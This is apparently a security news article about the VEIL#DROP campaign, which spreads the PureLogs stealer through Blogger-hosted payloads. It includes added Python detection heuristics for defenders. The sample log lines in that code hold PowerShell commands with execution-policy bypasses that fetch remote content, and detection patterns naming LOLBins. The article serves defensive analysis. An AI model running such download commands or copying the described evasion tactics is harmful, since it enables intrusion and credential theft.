How the Attack Chain Works
Security researchers have uncovered a sophisticated multi-stage malware delivery campaign, designated VEIL#DROP, that leverages Google’s Blogger platform to distribute the PureLogs information stealer. The infection chain begins when a user is tricked into executing a JavaScript file masquerading as a document, often delivered through spear-phishing emails or compromised websites.
Once executed, the JavaScript launches PowerShell with execution policy bypasses enabled. This PowerShell script then retrieves a next-stage payload hosted on a Blogger page, allowing attackers to bypass reputation-based defenses by abusing Google’s trusted infrastructure. The malware creates the illusion of a PDF document opening while silently proceeding with the infection in the background.
Evasion Tactics and Payload Execution
The VEIL#DROP framework employs several advanced evasion techniques. It dynamically generates unique Blogspot URLs for each execution by inserting a random number of forward slashes into the path, evading static URL signatures and filtering mechanisms. The script also introduces runtime mutation by replacing placeholder values with randomly generated strings during execution, defeating signature-based detection.
The final payload, PureLogs Stealer, is a .NET-based infostealer that harvests sensitive data from compromised systems. The malware executes entirely in memory without leaving disk artifacts, using reflective code loading techniques. If direct memory execution is blocked, it falls back to Microsoft-signed binaries such as regsvcs.exe and msbuild.exe to accomplish its goals while appearing legitimate.
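The behaviours described in the last three paragraphs (script host spawning PowerShell with an execution-policy bypass, a slash-padded Blogspot URL in the command line, and a fallback to regsvcs.exe or msbuild.exe) each leave a process-creation footprint a defender can match on. The following is an added example, not code from the article or from the researchers' report: it canonicalizes URLs so that slash-padded variants collapse to one form, and runs a few detection heuristics over constructed process-creation log lines. The `key="value"` log format, the host name `example-blog.blogspot.com`, and every path and command line in it are made up for the example and are not campaign indicators.

```python
"""Added example (not from the article or the researchers' report): defender-side
heuristics for the behaviours described above, run over constructed log lines.

Assumed log format (constructed for this example): one process-creation event per
line as space-separated key="value" pairs with the keys parent, image and cmdline.
All host names, paths and command lines below are made up; none are campaign IoCs.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Windows script hosts that run a .js dropper and, per the article, spawn PowerShell.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed binaries the article names as the fallback execution path.
LOLBINS = {"regsvcs.exe", "msbuild.exe"}
# -ExecutionPolicy Bypass and the prefix abbreviations PowerShell accepts (-ex, -exec, -ep).
EXEC_POLICY_BYPASS = re.compile(r"-(?:ex(?:ec(?:utionpolicy)?)?|ep)\s+bypass", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def canonicalize_url(url: str) -> str:
    """Collapse runs of '/' in the path so slash-padded variants of one URL compare equal.

    This is what lets a single allow/deny-list entry or signature cover the
    randomly slash-padded Blogspot URLs the article describes.
    """
    parts = urlsplit(url)
    path = re.sub(r"/{2,}", "/", parts.path) or "/"
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, parts.query, ""))


def parse_event(line: str) -> dict:
    """Parse one constructed key="value" log line into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def assess_event(line: str) -> dict:
    """Return the heuristic findings for one process-creation event."""
    ev = parse_event(line)
    parent = ev.get("parent", "").lower()
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    findings = []
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        findings.append("script-host-spawned-powershell")
    if EXEC_POLICY_BYPASS.search(cmd):
        findings.append("execution-policy-bypass")
    # Canonical URLs are what should be compared against reputation or block lists.
    urls = [canonicalize_url(u) for u in URL_RE.findall(cmd)]
    if any((urlsplit(u).hostname or "").endswith(".blogspot.com") for u in urls):
        findings.append("blogspot-fetch-in-cmdline")
    if parent == "powershell.exe" and image in LOLBINS:
        findings.append("lolbin-spawned-by-powershell")
    return {"findings": findings, "urls": urls, "score": len(findings)}


def triage(lines) -> list:
    """Assess every line; return only events with at least one finding, highest score first."""
    hits = [dict(line=l, **assess_event(l)) for l in lines]
    return sorted((h for h in hits if h["score"]), key=lambda h: -h["score"])


# Constructed sample events (not real telemetry). The first two point at the same
# Blogspot page written with different numbers of slashes; the third is the LOLBin
# fallback; the fourth is ordinary interactive admin use and should score zero.
SAMPLE_EVENTS = [
    'parent="wscript.exe" image="powershell.exe" cmdline="powershell.exe -ep bypass -c iwr https://example-blog.blogspot.com////2024/01///post.html"',
    'parent="wscript.exe" image="powershell.exe" cmdline="powershell.exe -ExecutionPolicy Bypass -c iwr https://example-blog.blogspot.com//2024////01/post.html"',
    'parent="powershell.exe" image="msbuild.exe" cmdline="msbuild.exe example-project.xml"',
    'parent="explorer.exe" image="powershell.exe" cmdline="powershell.exe -c Get-Service"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["findings"], hit["urls"])
```

Running the block prints the three suspicious events with their findings; the two slash-padded URLs resolve to the same canonical form, which is the property that defeats the per-execution URL mutation the article describes. Each heuristic on its own is noisy (administrators do run `-ExecutionPolicy Bypass`), so the score combines them and a single-finding event such as the msbuild.exe fallback is best treated as a lead to pivot on rather than an alert by itself.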
Impact and Scope
The impact of a PureLogs infection extends beyond the initial endpoint compromise. Harvested credentials and sensitive data can enable attackers to establish persistence, move laterally within networks, and potentially breach cloud infrastructure. The combination of trusted cloud service abuse, fileless execution, and living-off-the-land binary (LOLBin) abuse demonstrates a deliberate effort to evade traditional security controls and maintain operational stealth throughout the infection lifecycle.
Source: The Hacker News